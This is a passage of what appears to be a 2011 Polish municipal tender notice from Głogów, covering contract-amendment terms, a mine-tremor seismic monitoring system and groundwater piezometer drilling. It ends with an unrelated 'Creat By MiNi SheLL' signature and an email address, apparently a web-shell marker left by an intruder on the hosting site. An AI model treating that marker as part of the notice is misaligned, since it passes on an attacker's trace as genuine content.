1)	wystąpienia istotnych wad dokumentacji projektowej skutkujących koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji - zmianie ulegnie odpowiednio termin realizacji zamówienia,
2)	zaistnienie okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie mogą ulec termin realizacji umowy oraz terminy wynikające          z harmonogramu rzeczowo - finansowego, 
3)	gdy zaistnieje inna, niemożliwa do przewidzenia  w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia,
4)	wystąpienia przedłużającej się procedury badania i oceny ofert oraz procedury odwoławczej - zmianie może ulec termin realizacji zamówienia,
5)	konieczności wykonania ewentualnych zamówień dodatkowych, uzupełniających - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia,
6)	ograniczenia zakresu, czego nie można było przewidzieć mimo dochowania należytej staranności - Zamawiający dopuszcza możliwość zmiany umowy, w tym terminu realizacji zamówienia,
7.5. Pozostałe zmiany:
1)	jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wykonania  po stronie  wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  wykonawcę, 
2)	jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po stronie wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  wykonawcę ,
3)	rezygnacja  przez  zamawiającego z realizacji części   przedmiotu  umowy - w takim przypadku  wynagrodzenie  przysługujące  wykonawcy  zostanie  pomniejszone
7.6. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
1)	opis zmiany,
2)	uzasadnienie zmiany,
3)	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4)	czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. Inspektor Nadzoru oraz Kierownik budowy.

Powyższe zmiany zostaną wprowadzone do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Rynek 10 67-200 Głogów pok.125.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2011 godzina 10:00, miejsce: Urząd Miejski Rynek 10 67-200 Głogów pok.314.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest planowane do współfinansowania ze środków Unii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ruchy górotworu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Część pierwsza zamówienia obejmuje wykonanie niezależnego systemu monitorowania wstrząsów górniczych generowanych eksploatacją złoża rud miedzi w kopalniach LGOM, a w szczególności eksploatacją złoża w najbliższej przyszłości w północno - zachodnich częściach obszarów górniczych Rudna I i Sieroszowice I i w nowym obszarze koncesyjnym Głogów Głęboki -Przemysłowy oraz w dalszej perspektywie, w granicach obszaru dokumentacyjnego Głogów. System oparty będzie na 3 stanowiskach pomiarowych zlokalizowanych na terenie osiedli: im. Kopernika, im. Piastów Śląskich i na terenie Starego Miasta (budynek ratusza), wg poniższych założeń:
1)	zastosowanie typowych urządzeń/aparatury, kompatybilnych w stosunku do aparatury stosowanej w górnictwie; 
2)	zaprojektowanie systemu typu otwartego tj. systemu otwartego na możliwości wprowadzenia zmian i ilości stanowisk pomiarowych i ich wyposażenia; 
3)	zastosowanie bezprzewodowej transmisji danych ze stanowisk pomiarowych do punktu dyspozytorskiego; 
4)	organizacja punktu dyspozytorskiego w budynku Urzędu Miejskiego w Głogowie; 
5)	wybór lokalizacji punktów pomiarowych w części miasta o intensywnej zabudowie; 
6)	zlokalizować punkty pomiarowe możliwie w obiektach komunalnych lub użyteczności publicznej; 
7)	przy lokalizacji stanowisk pomiarowych należy kierować się warunkami zapewniającymi prawidłowość pracy, bezpieczeństwem zainstalowanych urządzeń, dostępnością energii elektrycznej do ich zasilania, dogodną transmisją danych drogą radiową; 
8)	zastosowanie rozwiązań angażujących minimalne koszty, możliwie najkrótszy okres realizacji i niezawodność funkcjonowania monitoringu;
Należy zastosować wielokanałowy rejestrator do rejestracji wstrząsów w formie sejsmogramów prędkości drgaqń (trzy składowe) oraz przyspieszenia drgań (trzy składowe) z oprogramowaniem do wizualizacji przebiegów i ich analizą w skali GSI-2004 oraz możliwością transmisji komórkowej danych do punktu dyspozytorskiego. Czas trwania rejestrowanych drgań dla wstrząsów nie może być mniejszy niż 15 s. Należy zapewnić rejestracji amplitud prędkości drgań do 0,2 m/s w całym paśmie od 0,5 do 40 Hz oraz możliwość rejestracji amplitud przyspieszenia drgań do 3 m/s2 w całym paśmie od 0,5 do 40 Hz. Minimalne próbkowanie - 100 pr/s. Charakterystyka amplitudowo - częstotliwościowa kanału sejsmicznego prostoliniowa w zakresie od 0,5 do 40 Hz. Synchronizacja czasu zapisu wstrząsów zgodna z czasem GPS. 
Punkt dyspozytorski - Przenośna stacja odbiorcza oparta o notebook z oprogramowaniem do czytania danych i analizy sygnałów z rejestratora wielokanałowego. Centralna stacja odbiorcza w biurze z oprogramowaniem do pobierania wstrząsów przesyłanych transmisją komórkową z rejestratorów zewnętrznych z podstawowym oprogramowaniem do analizy zarejestrowanych wstrząsów (tzn. filtracja przebiegów czasowych, korekta linii bazowej, całkowanie i różniczkowanie przebiegów czasowych, eksport i import wstrząsów w plikach ASCII i analiza częstotliwościowa FFT) z oprogramowaniem do analizy wstrząsów w skali GSI-2004 oraz oprogramowaniem do wykonywania raportów w skali GSI-2004. 
Należy wykonać projekt powykonawczy stanowisk pomiarowych w terenie i stacji odbiorczej w punkcie dyspozytorskim. Należy przewidzieć zakup 2 szafek do montażu stanowisk w terenie, załączyć charakterystyki kalibracyjne wszystkich kanałów sejsmicznych. 
Należy przewidzieć gotowość przygotowania plików z bazy zarejestrowanych wstrząsów w formacie kompatybilnym do pobierania danych przez stronę internetową o sejsmiczności w mieście. 
Ogólny schemat systemu pomiarowego
System pomiarowy obejmuje następujące podstawowe elementy:
-	aparatura rejestrująca drgania wywoływane przez wstrząsy górnicze, 
-	układ transmisji sygnałów sejsmicznych, 
-	mierniki drgań, 
-	punkt dyspozytorski, 
-	oprogramowanie do rejestracji, wizualizacji, analizy i prowadzenia bazy danych oraz przygotowania raportów o zarejestrowanych wstrząsach i innych drganiach parasejsmicznych. 
Zapewnienie sprzętu i oprogramowania do rejestracji, obróbki i archiwizacji danych, szkolenie personelu obsługującego, zapewnienie serwisu w pierwszym roku funkcjonowania. Należy zapewnić serwis pogwarancyjny. 
Projekt monitoringu z opisem lokalizacji założeń i wyposażenia stanowi załącznik do niniejszej specyfikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.54.00.00-2, 71.35.21.20-7, 71.35.21.30-0, 71.35.21.40-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Obserwacja poziomu wód gruntowych i podziemnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II zamówienia obejmuje wytyczenie miejsca wiercenia otworów i wykonanie otworów. Następnie wykonane będą prace wiertnicze:
- otwór Gm-1 około 10,5 m;
- otwór Gm-2 około 11,5 m;
- otwór Gm-3 około 6,5 m;
- otwór Gm-4 około 6,0 m.
Łączny metraż robót wiertniczych: 34,5 m.
Ostateczna głębokość każdego z otworów piezometrycznych będzie uzależniona od napotkanych warunków litologicznych. W związku z tym głębokość poszczególnych otworów może być mniejsza lub większa, stosownie do głębokości zalegania warstwy wodonośnej zakwalifikowanej przez dozór geologiczny do zainstalowania piezometru. W przypadku nie stwierdzenia w otworze warstwy wodonośnej do głębokości 6-12 m, otwór należy zlikwidować wydobytym urobkiem i w porozumieniu ze Zleceniodawcą i Użytkownikiem terenu ewentualnie wytyczyć nową lokalizację danego otworu z dodatkiem do numeru litery a. Przyjmuje się rezerwę dodatkowego metrażu wiercenia w wysokości 50%, tj. 17,25 m, z uwagi na możliwość wystąpienia konieczności przestawienia otworu (trudne do przewidzenia warunki geologiczne napotkane głazy, brak warstwy wodonośnej).
Przewiduje się odwiercenie otworów piezometrycznych metodą obrotową na sucho, samojezdnym aparatem wiertniczym typu ŁBU 50.
Konstrukcja projektowanych otworów
Projektuje się wykonanie otworów piezometrycznych przy zastosowaniu
następujących operacji technologicznych:
a)	wiercenie pod rury okładzinowe, 
b)	po zapuszczeniu kolumny rur wykonanie 0,5 m zagęszczonej poduszki żwirowej pod kolumnę filtracyjną; 
c)	centryczne (z zastosowaniem prowadników) opuszczenie do otworu kolumny piezometrycznej 
d)	wykonanie obsypki żwirowej,
e)	wykonanie obsypki izolacyjnej w interwale 
f)	wykonanie obudowy piezometru na powierzchni w postaci studzienki betonowej zamykanej płytą żelbetową, 
g)	wykonanie na obudowie trwałego oznakowania otworu.
Zamykanie horyzontów wodonośnych - W przypadku stwierdzenia w pierwszej napotkanej warstwie wodonośnej słabego zawodnienia lub wody zawieszonej, wiercenie będzie kontynuowane do górnej głównej warstwy czwartorzędowego piętra wodonośnego. Po jej nawierceniu będzie dokonany pomiar lustra wody nawierconego i statycznego. Po odwierceniu otworu, w czasie wyciągania kolumny rur okładzinowych, przypowierzchniowy odcinek obsypki zostanie wykonany z materiału izolacyjnego - glina, pył lub bentonit. Zapewni to zabezpieczenie ujmowanej warstwy wodonośnej przed migracją ewentualnych zanieczyszczeń z powierzchni terenu.
W trakcie wiercenia i po zafiltrowaniu otworu należy wykonać pomiar zwierciadła wody nawiercony i ustabilizowany, za pomocą sondy akustycznej lub elektrycznej.
Miejsce wiercenia otworu wytyczy nadzór geologiczny. Po wykonaniu wiercenia i obudowy geodeta wyznaczy współrzędne otworu i charakterystyczną rzędną obudowy piezometru.
Zapewnienie oprogramowania do rejestracji i archiwizacji danych, szkolenie personelu obsługującego, zapewnienie serwisu w pierwszym roku funkcjonowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.71.15.00-9, 76.43.13.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com